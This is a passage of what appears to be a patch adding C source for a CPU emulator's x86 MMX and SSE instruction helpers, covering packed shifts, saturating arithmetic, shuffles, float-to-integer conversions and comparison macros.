glue(helper_psrld, SUFFIX)(CPUX86State *env, Reg *d, Reg *s) +{ + int shift; + + if (s->Q(0) > 31) { + d->Q(0) = 0; +#if SHIFT == 1 + d->Q(1) = 0; +#endif + } else { + shift = s->B(0); + d->L(0) >>= shift; + d->L(1) >>= shift; +#if SHIFT == 1 + d->L(2) >>= shift; + d->L(3) >>= shift; +#endif + } +} + +void glue(helper_psrad, SUFFIX)(CPUX86State *env, Reg *d, Reg *s) +{ + int shift; + + if (s->Q(0) > 31) { + shift = 31; 
+ } else { + shift = s->B(0); + } + d->L(0) = (int32_t)d->L(0) >> shift; + d->L(1) = (int32_t)d->L(1) >> shift; +#if SHIFT == 1 + d->L(2) = (int32_t)d->L(2) >> shift; + d->L(3) = (int32_t)d->L(3) >> shift; +#endif +} + +void glue(helper_pslld, SUFFIX)(CPUX86State *env, Reg *d, Reg *s) +{ + int shift; + + if (s->Q(0) > 31) { + d->Q(0) = 0; +#if SHIFT == 1 + d->Q(1) = 0; +#endif + } else { + shift = s->B(0); + d->L(0) <<= shift; + d->L(1) <<= shift; +#if SHIFT == 1 + d->L(2) <<= shift; + d->L(3) <<= shift; +#endif + } +} + +void glue(helper_psrlq, SUFFIX)(CPUX86State *env, Reg *d, Reg *s) +{ + int shift; + + if (s->Q(0) > 63) { + d->Q(0) = 0; +#if SHIFT == 1 + d->Q(1) = 0; +#endif + } else { + shift = s->B(0); + d->Q(0) >>= shift; +#if SHIFT == 1 + d->Q(1) >>= shift; +#endif + } +} + +void glue(helper_psllq, SUFFIX)(CPUX86State *env, Reg *d, Reg *s) +{ + int shift; + + if (s->Q(0) > 63) { + d->Q(0) = 0; +#if SHIFT == 1 + d->Q(1) = 0; +#endif + } else { + shift = s->B(0); + d->Q(0) <<= shift; +#if SHIFT == 1 + d->Q(1) <<= shift; +#endif + } +} + +#if SHIFT == 1 +void glue(helper_psrldq, SUFFIX)(CPUX86State *env, Reg *d, Reg *s) +{ + int shift, i; + + shift = s->L(0); + if (shift > 16) { + shift = 16; + } + for (i = 0; i < 16 - shift; i++) { + d->B(i) = d->B(i + shift); + } + for (i = 16 - shift; i < 16; i++) { + d->B(i) = 0; + } +} + +void glue(helper_pslldq, SUFFIX)(CPUX86State *env, Reg *d, Reg *s) +{ + int shift, i; + + shift = s->L(0); + if (shift > 16) { + shift = 16; + } + for (i = 15; i >= shift; i--) { + d->B(i) = d->B(i - shift); + } + for (i = 0; i < shift; i++) { + d->B(i) = 0; + } +} +#endif + +#define SSE_HELPER_B(name, F) \ + void glue(name, SUFFIX)(CPUX86State *env, Reg *d, Reg *s) \ + { \ + d->B(0) = F(d->B(0), s->B(0)); \ + d->B(1) = F(d->B(1), s->B(1)); \ + d->B(2) = F(d->B(2), s->B(2)); \ + d->B(3) = F(d->B(3), s->B(3)); \ + d->B(4) = F(d->B(4), s->B(4)); \ + d->B(5) = F(d->B(5), s->B(5)); \ + d->B(6) = F(d->B(6), s->B(6)); \ + d->B(7) = F(d->B(7), 
s->B(7)); \ + XMM_ONLY( \ + d->B(8) = F(d->B(8), s->B(8)); \ + d->B(9) = F(d->B(9), s->B(9)); \ + d->B(10) = F(d->B(10), s->B(10)); \ + d->B(11) = F(d->B(11), s->B(11)); \ + d->B(12) = F(d->B(12), s->B(12)); \ + d->B(13) = F(d->B(13), s->B(13)); \ + d->B(14) = F(d->B(14), s->B(14)); \ + d->B(15) = F(d->B(15), s->B(15)); \ + ) \ + } + +#define SSE_HELPER_W(name, F) \ + void glue(name, SUFFIX)(CPUX86State *env, Reg *d, Reg *s) \ + { \ + d->W(0) = F(d->W(0), s->W(0)); \ + d->W(1) = F(d->W(1), s->W(1)); \ + d->W(2) = F(d->W(2), s->W(2)); \ + d->W(3) = F(d->W(3), s->W(3)); \ + XMM_ONLY( \ + d->W(4) = F(d->W(4), s->W(4)); \ + d->W(5) = F(d->W(5), s->W(5)); \ + d->W(6) = F(d->W(6), s->W(6)); \ + d->W(7) = F(d->W(7), s->W(7)); \ + ) \ + } + +#define SSE_HELPER_L(name, F) \ + void glue(name, SUFFIX)(CPUX86State *env, Reg *d, Reg *s) \ + { \ + d->L(0) = F(d->L(0), s->L(0)); \ + d->L(1) = F(d->L(1), s->L(1)); \ + XMM_ONLY( \ + d->L(2) = F(d->L(2), s->L(2)); \ + d->L(3) = F(d->L(3), s->L(3)); \ + ) \ + } + +#define SSE_HELPER_Q(name, F) \ + void glue(name, SUFFIX)(CPUX86State *env, Reg *d, Reg *s) \ + { \ + d->Q(0) = F(d->Q(0), s->Q(0)); \ + XMM_ONLY( \ + d->Q(1) = F(d->Q(1), s->Q(1)); \ + ) \ + } + +#if SHIFT == 0 +static inline int satub(int x) +{ + if (x < 0) { + return 0; + } else if (x > 255) { + return 255; + } else { + return x; + } +} + +static inline int satuw(int x) +{ + if (x < 0) { + return 0; + } else if (x > 65535) { + return 65535; + } else { + return x; + } +} + +static inline int satsb(int x) +{ + if (x < -128) { + return -128; + } else if (x > 127) { + return 127; + } else { + return x; + } +} + +static inline int satsw(int x) +{ + if (x < -32768) { + return -32768; + } else if (x > 32767) { + return 32767; + } else { + return x; + } +} + +#define FADD(a, b) ((a) + (b)) +#define FADDUB(a, b) satub((a) + (b)) +#define FADDUW(a, b) satuw((a) + (b)) +#define FADDSB(a, b) satsb((int8_t)(a) + (int8_t)(b)) +#define FADDSW(a, b) satsw((int16_t)(a) + (int16_t)(b)) + 
+#define FSUB(a, b) ((a) - (b)) +#define FSUBUB(a, b) satub((a) - (b)) +#define FSUBUW(a, b) satuw((a) - (b)) +#define FSUBSB(a, b) satsb((int8_t)(a) - (int8_t)(b)) +#define FSUBSW(a, b) satsw((int16_t)(a) - (int16_t)(b)) +#define FMINUB(a, b) ((a) < (b)) ? (a) : (b) +#define FMINSW(a, b) ((int16_t)(a) < (int16_t)(b)) ? (a) : (b) +#define FMAXUB(a, b) ((a) > (b)) ? (a) : (b) +#define FMAXSW(a, b) ((int16_t)(a) > (int16_t)(b)) ? (a) : (b) + +#define FAND(a, b) ((a) & (b)) +#define FANDN(a, b) ((~(a)) & (b)) +#define FOR(a, b) ((a) | (b)) +#define FXOR(a, b) ((a) ^ (b)) + +#define FCMPGTB(a, b) ((int8_t)(a) > (int8_t)(b) ? -1 : 0) +#define FCMPGTW(a, b) ((int16_t)(a) > (int16_t)(b) ? -1 : 0) +#define FCMPGTL(a, b) ((int32_t)(a) > (int32_t)(b) ? -1 : 0) +#define FCMPEQ(a, b) ((a) == (b) ? -1 : 0) + +#define FMULLW(a, b) ((int64_t)(a) * (b)) +#define FMULHRW(a, b) (((int16_t)(a) * (int16_t)(b) + 0x8000) >> 16) +#define FMULHUW(a, b) ((int64_t)(a) * (b) >> 16) +#define FMULHW(a, b) ((int16_t)(a) * (int16_t)(b) >> 16) + +#define FAVG(a, b) (((a) + (b) + 1) >> 1) +#endif + +SSE_HELPER_B(helper_paddb, FADD) +SSE_HELPER_W(helper_paddw, FADD) +SSE_HELPER_L(helper_paddl, FADD) +SSE_HELPER_Q(helper_paddq, FADD) + +SSE_HELPER_B(helper_psubb, FSUB) +SSE_HELPER_W(helper_psubw, FSUB) +SSE_HELPER_L(helper_psubl, FSUB) +SSE_HELPER_Q(helper_psubq, FSUB) + +SSE_HELPER_B(helper_paddusb, FADDUB) +SSE_HELPER_B(helper_paddsb, FADDSB) +SSE_HELPER_B(helper_psubusb, FSUBUB) +SSE_HELPER_B(helper_psubsb, FSUBSB) + +SSE_HELPER_W(helper_paddusw, FADDUW) +SSE_HELPER_W(helper_paddsw, FADDSW) +SSE_HELPER_W(helper_psubusw, FSUBUW) +SSE_HELPER_W(helper_psubsw, FSUBSW) + +SSE_HELPER_B(helper_pminub, FMINUB) +SSE_HELPER_B(helper_pmaxub, FMAXUB) + +SSE_HELPER_W(helper_pminsw, FMINSW) +SSE_HELPER_W(helper_pmaxsw, FMAXSW) + +SSE_HELPER_Q(helper_pand, FAND) +SSE_HELPER_Q(helper_pandn, FANDN) +SSE_HELPER_Q(helper_por, FOR) +SSE_HELPER_Q(helper_pxor, FXOR) + +SSE_HELPER_B(helper_pcmpgtb, FCMPGTB) 
+SSE_HELPER_W(helper_pcmpgtw, FCMPGTW) +SSE_HELPER_L(helper_pcmpgtl, FCMPGTL) + +SSE_HELPER_B(helper_pcmpeqb, FCMPEQ) +SSE_HELPER_W(helper_pcmpeqw, FCMPEQ) +SSE_HELPER_L(helper_pcmpeql, FCMPEQ) + +SSE_HELPER_W(helper_pmullw, FMULLW) +#if SHIFT == 0 +SSE_HELPER_W(helper_pmulhrw, FMULHRW) +#endif +SSE_HELPER_W(helper_pmulhuw, FMULHUW) +SSE_HELPER_W(helper_pmulhw, FMULHW) + +SSE_HELPER_B(helper_pavgb, FAVG) +SSE_HELPER_W(helper_pavgw, FAVG) + +void glue(helper_pmuludq, SUFFIX)(CPUX86State *env, Reg *d, Reg *s) +{ + d->Q(0) = (uint64_t)s->L(0) * (uint64_t)d->L(0); +#if SHIFT == 1 + d->Q(1) = (uint64_t)s->L(2) * (uint64_t)d->L(2); +#endif +} + +void glue(helper_pmaddwd, SUFFIX)(CPUX86State *env, Reg *d, Reg *s) +{ + int i; + + for (i = 0; i < (2 << SHIFT); i++) { + d->L(i) = (int16_t)s->W(2 * i) * (int16_t)d->W(2 * i) + + (int16_t)s->W(2 * i + 1) * (int16_t)d->W(2 * i + 1); + } +} + +#if SHIFT == 0 +static inline int abs1(int a) +{ + if (a < 0 && a != 0x80000000) { + return -a; + } else { + return a; + } +} +#endif +void glue(helper_psadbw, SUFFIX)(CPUX86State *env, Reg *d, Reg *s) +{ + unsigned int val; + + val = 0; + val += abs1(d->B(0) - s->B(0)); + val += abs1(d->B(1) - s->B(1)); + val += abs1(d->B(2) - s->B(2)); + val += abs1(d->B(3) - s->B(3)); + val += abs1(d->B(4) - s->B(4)); + val += abs1(d->B(5) - s->B(5)); + val += abs1(d->B(6) - s->B(6)); + val += abs1(d->B(7) - s->B(7)); + d->Q(0) = val; +#if SHIFT == 1 + val = 0; + val += abs1(d->B(8) - s->B(8)); + val += abs1(d->B(9) - s->B(9)); + val += abs1(d->B(10) - s->B(10)); + val += abs1(d->B(11) - s->B(11)); + val += abs1(d->B(12) - s->B(12)); + val += abs1(d->B(13) - s->B(13)); + val += abs1(d->B(14) - s->B(14)); + val += abs1(d->B(15) - s->B(15)); + d->Q(1) = val; +#endif +} + +void glue(helper_maskmov, SUFFIX)(CPUX86State *env, Reg *d, Reg *s, + target_ulong a0) +{ + int i; + + for (i = 0; i < (8 << SHIFT); i++) { + if (s->B(i) & 0x80) { + cpu_stb_data(env, a0 + i, d->B(i)); + } + } +} + +void 
glue(helper_movl_mm_T0, SUFFIX)(Reg *d, uint32_t val) +{ + d->L(0) = val; + d->L(1) = 0; +#if SHIFT == 1 + d->Q(1) = 0; +#endif +} + +#ifdef TARGET_X86_64 +void glue(helper_movq_mm_T0, SUFFIX)(Reg *d, uint64_t val) +{ + d->Q(0) = val; +#if SHIFT == 1 + d->Q(1) = 0; +#endif +} +#endif + +#if SHIFT == 0 +void glue(helper_pshufw, SUFFIX)(Reg *d, Reg *s, int order) +{ + Reg r; + + r.W(0) = s->W(order & 3); + r.W(1) = s->W((order >> 2) & 3); + r.W(2) = s->W((order >> 4) & 3); + r.W(3) = s->W((order >> 6) & 3); + *d = r; +} +#else +void helper_shufps(Reg *d, Reg *s, int order) +{ + Reg r; + + r.L(0) = d->L(order & 3); + r.L(1) = d->L((order >> 2) & 3); + r.L(2) = s->L((order >> 4) & 3); + r.L(3) = s->L((order >> 6) & 3); + *d = r; +} + +void helper_shufpd(Reg *d, Reg *s, int order) +{ + Reg r; + + r.Q(0) = d->Q(order & 1); + r.Q(1) = s->Q((order >> 1) & 1); + *d = r; +} + +void glue(helper_pshufd, SUFFIX)(Reg *d, Reg *s, int order) +{ + Reg r; + + r.L(0) = s->L(order & 3); + r.L(1) = s->L((order >> 2) & 3); + r.L(2) = s->L((order >> 4) & 3); + r.L(3) = s->L((order >> 6) & 3); + *d = r; +} + +void glue(helper_pshuflw, SUFFIX)(Reg *d, Reg *s, int order) +{ + Reg r; + + r.W(0) = s->W(order & 3); + r.W(1) = s->W((order >> 2) & 3); + r.W(2) = s->W((order >> 4) & 3); + r.W(3) = s->W((order >> 6) & 3); + r.Q(1) = s->Q(1); + *d = r; +} + +void glue(helper_pshufhw, SUFFIX)(Reg *d, Reg *s, int order) +{ + Reg r; + + r.Q(0) = s->Q(0); + r.W(4) = s->W(4 + (order & 3)); + r.W(5) = s->W(4 + ((order >> 2) & 3)); + r.W(6) = s->W(4 + ((order >> 4) & 3)); + r.W(7) = s->W(4 + ((order >> 6) & 3)); + *d = r; +} +#endif + +#if SHIFT == 1 +/* FPU ops */ +/* XXX: not accurate */ + +#define SSE_HELPER_S(name, F) \ + void helper_ ## name ## ps(CPUX86State *env, Reg *d, Reg *s) \ + { \ + d->XMM_S(0) = F(32, d->XMM_S(0), s->XMM_S(0)); \ + d->XMM_S(1) = F(32, d->XMM_S(1), s->XMM_S(1)); \ + d->XMM_S(2) = F(32, d->XMM_S(2), s->XMM_S(2)); \ + d->XMM_S(3) = F(32, d->XMM_S(3), s->XMM_S(3)); \ + } \ + \ + 
void helper_ ## name ## ss(CPUX86State *env, Reg *d, Reg *s) \ + { \ + d->XMM_S(0) = F(32, d->XMM_S(0), s->XMM_S(0)); \ + } \ + \ + void helper_ ## name ## pd(CPUX86State *env, Reg *d, Reg *s) \ + { \ + d->XMM_D(0) = F(64, d->XMM_D(0), s->XMM_D(0)); \ + d->XMM_D(1) = F(64, d->XMM_D(1), s->XMM_D(1)); \ + } \ + \ + void helper_ ## name ## sd(CPUX86State *env, Reg *d, Reg *s) \ + { \ + d->XMM_D(0) = F(64, d->XMM_D(0), s->XMM_D(0)); \ + } + +#define FPU_ADD(size, a, b) float ## size ## _add(a, b, &env->sse_status) +#define FPU_SUB(size, a, b) float ## size ## _sub(a, b, &env->sse_status) +#define FPU_MUL(size, a, b) float ## size ## _mul(a, b, &env->sse_status) +#define FPU_DIV(size, a, b) float ## size ## _div(a, b, &env->sse_status) +#define FPU_SQRT(size, a, b) float ## size ## _sqrt(b, &env->sse_status) + +/* Note that the choice of comparison op here is important to get the + * special cases right: for min and max Intel specifies that (-0,0), + * (NaN, anything) and (anything, NaN) return the second argument. + */ +#define FPU_MIN(size, a, b) \ + (float ## size ## _lt(a, b, &env->sse_status) ? (a) : (b)) +#define FPU_MAX(size, a, b) \ + (float ## size ## _lt(b, a, &env->sse_status) ? 
(a) : (b)) + +SSE_HELPER_S(add, FPU_ADD) +SSE_HELPER_S(sub, FPU_SUB) +SSE_HELPER_S(mul, FPU_MUL) +SSE_HELPER_S(div, FPU_DIV) +SSE_HELPER_S(min, FPU_MIN) +SSE_HELPER_S(max, FPU_MAX) +SSE_HELPER_S(sqrt, FPU_SQRT) + + +/* float to float conversions */ +void helper_cvtps2pd(CPUX86State *env, Reg *d, Reg *s) +{ + float32 s0, s1; + + s0 = s->XMM_S(0); + s1 = s->XMM_S(1); + d->XMM_D(0) = float32_to_float64(s0, &env->sse_status); + d->XMM_D(1) = float32_to_float64(s1, &env->sse_status); +} + +void helper_cvtpd2ps(CPUX86State *env, Reg *d, Reg *s) +{ + d->XMM_S(0) = float64_to_float32(s->XMM_D(0), &env->sse_status); + d->XMM_S(1) = float64_to_float32(s->XMM_D(1), &env->sse_status); + d->Q(1) = 0; +} + +void helper_cvtss2sd(CPUX86State *env, Reg *d, Reg *s) +{ + d->XMM_D(0) = float32_to_float64(s->XMM_S(0), &env->sse_status); +} + +void helper_cvtsd2ss(CPUX86State *env, Reg *d, Reg *s) +{ + d->XMM_S(0) = float64_to_float32(s->XMM_D(0), &env->sse_status); +} + +/* integer to float */ +void helper_cvtdq2ps(CPUX86State *env, Reg *d, Reg *s) +{ + d->XMM_S(0) = int32_to_float32(s->XMM_L(0), &env->sse_status); + d->XMM_S(1) = int32_to_float32(s->XMM_L(1), &env->sse_status); + d->XMM_S(2) = int32_to_float32(s->XMM_L(2), &env->sse_status); + d->XMM_S(3) = int32_to_float32(s->XMM_L(3), &env->sse_status); +} + +void helper_cvtdq2pd(CPUX86State *env, Reg *d, Reg *s) +{ + int32_t l0, l1; + + l0 = (int32_t)s->XMM_L(0); + l1 = (int32_t)s->XMM_L(1); + d->XMM_D(0) = int32_to_float64(l0, &env->sse_status); + d->XMM_D(1) = int32_to_float64(l1, &env->sse_status); +} + +void helper_cvtpi2ps(CPUX86State *env, XMMReg *d, MMXReg *s) +{ + d->XMM_S(0) = int32_to_float32(s->MMX_L(0), &env->sse_status); + d->XMM_S(1) = int32_to_float32(s->MMX_L(1), &env->sse_status); +} + +void helper_cvtpi2pd(CPUX86State *env, XMMReg *d, MMXReg *s) +{ + d->XMM_D(0) = int32_to_float64(s->MMX_L(0), &env->sse_status); + d->XMM_D(1) = int32_to_float64(s->MMX_L(1), &env->sse_status); +} + +void helper_cvtsi2ss(CPUX86State 
*env, XMMReg *d, uint32_t val) +{ + d->XMM_S(0) = int32_to_float32(val, &env->sse_status); +} + +void helper_cvtsi2sd(CPUX86State *env, XMMReg *d, uint32_t val) +{ + d->XMM_D(0) = int32_to_float64(val, &env->sse_status); +} + +#ifdef TARGET_X86_64 +void helper_cvtsq2ss(CPUX86State *env, XMMReg *d, uint64_t val) +{ + d->XMM_S(0) = int64_to_float32(val, &env->sse_status); +} + +void helper_cvtsq2sd(CPUX86State *env, XMMReg *d, uint64_t val) +{ + d->XMM_D(0) = int64_to_float64(val, &env->sse_status); +} +#endif + +/* float to integer */ + +/* + * x86 mandates that we return the indefinite integer value for the result + * of any float-to-integer conversion that raises the 'invalid' exception. + * Wrap the softfloat functions to get this behaviour. + */ +#define WRAP_FLOATCONV(RETTYPE, FN, FLOATTYPE, INDEFVALUE) \ + static inline RETTYPE x86_##FN(FLOATTYPE a, float_status *s) \ + { \ + int oldflags, newflags; \ + RETTYPE r; \ + \ + oldflags = get_float_exception_flags(s); \ + set_float_exception_flags(0, s); \ + r = FN(a, s); \ + newflags = get_float_exception_flags(s); \ + if (newflags & float_flag_invalid) { \ + r = INDEFVALUE; \ + } \ + set_float_exception_flags(newflags | oldflags, s); \ + return r; \ + } + +WRAP_FLOATCONV(int32_t, float32_to_int32, float32, INT32_MIN) +WRAP_FLOATCONV(int32_t, float32_to_int32_round_to_zero, float32, INT32_MIN) +WRAP_FLOATCONV(int32_t, float64_to_int32, float64, INT32_MIN) +WRAP_FLOATCONV(int32_t, float64_to_int32_round_to_zero, float64, INT32_MIN) +WRAP_FLOATCONV(int64_t, float32_to_int64, float32, INT64_MIN) +WRAP_FLOATCONV(int64_t, float32_to_int64_round_to_zero, float32, INT64_MIN) +WRAP_FLOATCONV(int64_t, float64_to_int64, float64, INT64_MIN) +WRAP_FLOATCONV(int64_t, float64_to_int64_round_to_zero, float64, INT64_MIN) + +void helper_cvtps2dq(CPUX86State *env, XMMReg *d, XMMReg *s) +{ + d->XMM_L(0) = x86_float32_to_int32(s->XMM_S(0), &env->sse_status); + d->XMM_L(1) = x86_float32_to_int32(s->XMM_S(1), &env->sse_status); + 
d->XMM_L(2) = x86_float32_to_int32(s->XMM_S(2), &env->sse_status); + d->XMM_L(3) = x86_float32_to_int32(s->XMM_S(3), &env->sse_status); +} + +void helper_cvtpd2dq(CPUX86State *env, XMMReg *d, XMMReg *s) +{ + d->XMM_L(0) = x86_float64_to_int32(s->XMM_D(0), &env->sse_status); + d->XMM_L(1) = x86_float64_to_int32(s->XMM_D(1), &env->sse_status); + d->XMM_Q(1) = 0; +} + +void helper_cvtps2pi(CPUX86State *env, MMXReg *d, XMMReg *s) +{ + d->MMX_L(0) = x86_float32_to_int32(s->XMM_S(0), &env->sse_status); + d->MMX_L(1) = x86_float32_to_int32(s->XMM_S(1), &env->sse_status); +} + +void helper_cvtpd2pi(CPUX86State *env, MMXReg *d, XMMReg *s) +{ + d->MMX_L(0) = x86_float64_to_int32(s->XMM_D(0), &env->sse_status); + d->MMX_L(1) = x86_float64_to_int32(s->XMM_D(1), &env->sse_status); +} + +int32_t helper_cvtss2si(CPUX86State *env, XMMReg *s) +{ + return x86_float32_to_int32(s->XMM_S(0), &env->sse_status); +} + +int32_t helper_cvtsd2si(CPUX86State *env, XMMReg *s) +{ + return x86_float64_to_int32(s->XMM_D(0), &env->sse_status); +} + +#ifdef TARGET_X86_64 +int64_t helper_cvtss2sq(CPUX86State *env, XMMReg *s) +{ + return x86_float32_to_int64(s->XMM_S(0), &env->sse_status); +} + +int64_t helper_cvtsd2sq(CPUX86State *env, XMMReg *s) +{ + return x86_float64_to_int64(s->XMM_D(0), &env->sse_status); +} +#endif + +/* float to integer truncated */ +void helper_cvttps2dq(CPUX86State *env, XMMReg *d, XMMReg *s) +{ + d->XMM_L(0) = x86_float32_to_int32_round_to_zero(s->XMM_S(0), &env->sse_status); + d->XMM_L(1) = x86_float32_to_int32_round_to_zero(s->XMM_S(1), &env->sse_status); + d->XMM_L(2) = x86_float32_to_int32_round_to_zero(s->XMM_S(2), &env->sse_status); + d->XMM_L(3) = x86_float32_to_int32_round_to_zero(s->XMM_S(3), &env->sse_status); +} + +void helper_cvttpd2dq(CPUX86State *env, XMMReg *d, XMMReg *s) +{ + d->XMM_L(0) = x86_float64_to_int32_round_to_zero(s->XMM_D(0), &env->sse_status); + d->XMM_L(1) = x86_float64_to_int32_round_to_zero(s->XMM_D(1), &env->sse_status); + d->XMM_Q(1) = 0; 
+} + +void helper_cvttps2pi(CPUX86State *env, MMXReg *d, XMMReg *s) +{ + d->MMX_L(0) = x86_float32_to_int32_round_to_zero(s->XMM_S(0), &env->sse_status); + d->MMX_L(1) = x86_float32_to_int32_round_to_zero(s->XMM_S(1), &env->sse_status); +} + +void helper_cvttpd2pi(CPUX86State *env, MMXReg *d, XMMReg *s) +{ + d->MMX_L(0) = x86_float64_to_int32_round_to_zero(s->XMM_D(0), &env->sse_status); + d->MMX_L(1) = x86_float64_to_int32_round_to_zero(s->XMM_D(1), &env->sse_status); +} + +int32_t helper_cvttss2si(CPUX86State *env, XMMReg *s) +{ + return x86_float32_to_int32_round_to_zero(s->XMM_S(0), &env->sse_status); +} + +int32_t helper_cvttsd2si(CPUX86State *env, XMMReg *s) +{ + return x86_float64_to_int32_round_to_zero(s->XMM_D(0), &env->sse_status); +} + +#ifdef TARGET_X86_64 +int64_t helper_cvttss2sq(CPUX86State *env, XMMReg *s) +{ + return x86_float32_to_int64_round_to_zero(s->XMM_S(0), &env->sse_status); +} + +int64_t helper_cvttsd2sq(CPUX86State *env, XMMReg *s) +{ + return x86_float64_to_int64_round_to_zero(s->XMM_D(0), &env->sse_status); +} +#endif + +void helper_rsqrtps(CPUX86State *env, XMMReg *d, XMMReg *s) +{ + d->XMM_S(0) = float32_div(float32_one, + float32_sqrt(s->XMM_S(0), &env->sse_status), + &env->sse_status); + d->XMM_S(1) = float32_div(float32_one, + float32_sqrt(s->XMM_S(1), &env->sse_status), + &env->sse_status); + d->XMM_S(2) = float32_div(float32_one, + float32_sqrt(s->XMM_S(2), &env->sse_status), + &env->sse_status); + d->XMM_S(3) = float32_div(float32_one, + float32_sqrt(s->XMM_S(3), &env->sse_status), + &env->sse_status); +} + +void helper_rsqrtss(CPUX86State *env, XMMReg *d, XMMReg *s) +{ + d->XMM_S(0) = float32_div(float32_one, + float32_sqrt(s->XMM_S(0), &env->sse_status), + &env->sse_status); +} + +void helper_rcpps(CPUX86State *env, XMMReg *d, XMMReg *s) +{ + d->XMM_S(0) = float32_div(float32_one, s->XMM_S(0), &env->sse_status); + d->XMM_S(1) = float32_div(float32_one, s->XMM_S(1), &env->sse_status); + d->XMM_S(2) = float32_div(float32_one, 
s->XMM_S(2), &env->sse_status); + d->XMM_S(3) = float32_div(float32_one, s->XMM_S(3), &env->sse_status); +} + +void helper_rcpss(CPUX86State *env, XMMReg *d, XMMReg *s) +{ + d->XMM_S(0) = float32_div(float32_one, s->XMM_S(0), &env->sse_status); +} + +static inline uint64_t helper_extrq(uint64_t src, int shift, int len) +{ + uint64_t mask; + + if (len == 0) { + mask = ~0LL; + } else { + mask = (1ULL << (len & 0x3f)) - 1; + } + return (src >> (shift & 0x3f)) & mask; +} + +void helper_extrq_r(CPUX86State *env, XMMReg *d, XMMReg *s) +{ + d->XMM_Q(0) = helper_extrq(d->XMM_Q(0), s->XMM_B(1), s->XMM_B(0)); +} + +void helper_extrq_i(CPUX86State *env, XMMReg *d, int index, int length) +{ + d->XMM_Q(0) = helper_extrq(d->XMM_Q(0), index, length); +} + +static inline uint64_t helper_insertq(uint64_t src, int shift, int len) +{ + uint64_t mask; + + if (len == 0) { + mask = ~0ULL; + } else { + mask = (1ULL << (len & 0x3f)) - 1; + } + return (src & ~(mask << (shift & 0x3f))) | ((src & mask) << (shift & 0x3f)); +} + +void helper_insertq_r(CPUX86State *env, XMMReg *d, XMMReg *s) +{ + d->XMM_Q(0) = helper_insertq(s->XMM_Q(0), s->XMM_B(9), s->XMM_B(8)); +} + +void helper_insertq_i(CPUX86State *env, XMMReg *d, int index, int length) +{ + d->XMM_Q(0) = helper_insertq(d->XMM_Q(0), index, length); +} + +void helper_haddps(CPUX86State *env, XMMReg *d, XMMReg *s) +{ + XMMReg r; + + r.XMM_S(0) = float32_add(d->XMM_S(0), d->XMM_S(1), &env->sse_status); + r.XMM_S(1) = float32_add(d->XMM_S(2), d->XMM_S(3), &env->sse_status); + r.XMM_S(2) = float32_add(s->XMM_S(0), s->XMM_S(1), &env->sse_status); + r.XMM_S(3) = float32_add(s->XMM_S(2), s->XMM_S(3), &env->sse_status); + *d = r; +} + +void helper_haddpd(CPUX86State *env, XMMReg *d, XMMReg *s) +{ + XMMReg r; + + r.XMM_D(0) = float64_add(d->XMM_D(0), d->XMM_D(1), &env->sse_status); + r.XMM_D(1) = float64_add(s->XMM_D(0), s->XMM_D(1), &env->sse_status); + *d = r; +} + +void helper_hsubps(CPUX86State *env, XMMReg *d, XMMReg *s) +{ + XMMReg r; + + 
r.XMM_S(0) = float32_sub(d->XMM_S(0), d->XMM_S(1), &env->sse_status); + r.XMM_S(1) = float32_sub(d->XMM_S(2), d->XMM_S(3), &env->sse_status); + r.XMM_S(2) = float32_sub(s->XMM_S(0), s->XMM_S(1), &env->sse_status); + r.XMM_S(3) = float32_sub(s->XMM_S(2), s->XMM_S(3), &env->sse_status); + *d = r; +} + +void helper_hsubpd(CPUX86State *env, XMMReg *d, XMMReg *s) +{ + XMMReg r; + + r.XMM_D(0) = float64_sub(d->XMM_D(0), d->XMM_D(1), &env->sse_status); + r.XMM_D(1) = float64_sub(s->XMM_D(0), s->XMM_D(1), &env->sse_status); + *d = r; +} + +void helper_addsubps(CPUX86State *env, XMMReg *d, XMMReg *s) +{ + d->XMM_S(0) = float32_sub(d->XMM_S(0), s->XMM_S(0), &env->sse_status); + d->XMM_S(1) = float32_add(d->XMM_S(1), s->XMM_S(1), &env->sse_status); + d->XMM_S(2) = float32_sub(d->XMM_S(2), s->XMM_S(2), &env->sse_status); + d->XMM_S(3) = float32_add(d->XMM_S(3), s->XMM_S(3), &env->sse_status); +} + +void helper_addsubpd(CPUX86State *env, XMMReg *d, XMMReg *s) +{ + d->XMM_D(0) = float64_sub(d->XMM_D(0), s->XMM_D(0), &env->sse_status); + d->XMM_D(1) = float64_add(d->XMM_D(1), s->XMM_D(1), &env->sse_status); +} + +/* XXX: unordered */ +#define SSE_HELPER_CMP(name, F) \ + void helper_ ## name ## ps(CPUX86State *env, Reg *d, Reg *s) \ + { \ + d->XMM_L(0) = F(32, d->XMM_S(0), s->XMM_S(0)); \ + d->XMM_L(1) = F(32, d->XMM_S(1), s->XMM_S(1)); \ + d->XMM_L(2) = F(32, d->XMM_S(2), s->XMM_S(2)); \ + d->XMM_L(3) = F(32, d->XMM_S(3), s->XMM_S(3)); \ + } \ + \ + void helper_ ## name ## ss(CPUX86State *env, Reg *d, Reg *s) \ + { \ + d->XMM_L(0) = F(32, d->XMM_S(0), s->XMM_S(0)); \ + } \ + \ + void helper_ ## name ## pd(CPUX86State *env, Reg *d, Reg *s) \ + { \ + d->XMM_Q(0) = F(64, d->XMM_D(0), s->XMM_D(0)); \ + d->XMM_Q(1) = F(64, d->XMM_D(1), s->XMM_D(1)); \ + } \ + \ + void helper_ ## name ## sd(CPUX86State *env, Reg *d, Reg *s) \ + { \ + d->XMM_Q(0) = F(64, d->XMM_D(0), s->XMM_D(0)); \ + } + +#define FPU_CMPEQ(size, a, b) \ + (float ## size ## _eq_quiet(a, b, &env->sse_status) ? 
-1 : 0) +#define FPU_CMPLT(size, a, b) \ + (float ## size ## _lt(a, b, &env->sse_status) ? -1 : 0) +#define FPU_CMPLE(size, a, b) \ + (float ## size ## _le(a, b, &env->sse_status) ? -1 : 0) +#define FPU_CMPUNORD(size, a, b) \ + (float ## size ## _unordered_quiet(a, b, &env->sse_status) ? -1 : 0) +#define FPU_CMPNEQ(size, a, b) \ + (float ## size ## _eq_quiet(a, b, &env->sse_status) ? 0 : -1) +#define FPU_CMPNLT(size, a, b) \ + (float ## size ## _lt(a, b, &env->sse_status) ? 0 : -1) +#define FPU_CMPNLE(size, a, b) \ + (float ## size ## _le(a, b, &env->sse_status) ? 0 : -1) +#define FPU_CMPORD(size, a, b) \ + (float ## size ## _unordered_quiet(a, b, &env->sse_status) ? 0 : -1) + +SSE_HELPER_CMP(cmpeq, FPU_CMPEQ) +SSE_HELPER_CMP(cmplt, FPU_CMPLT) +SSE_HELPER_CMP(cmple, FPU_CMPLE) +SSE_HELPER_CMP(cmpunord, FPU_CMPUNORD) +SSE_HELPER_CMP(cmpneq, FPU_CMPNEQ) 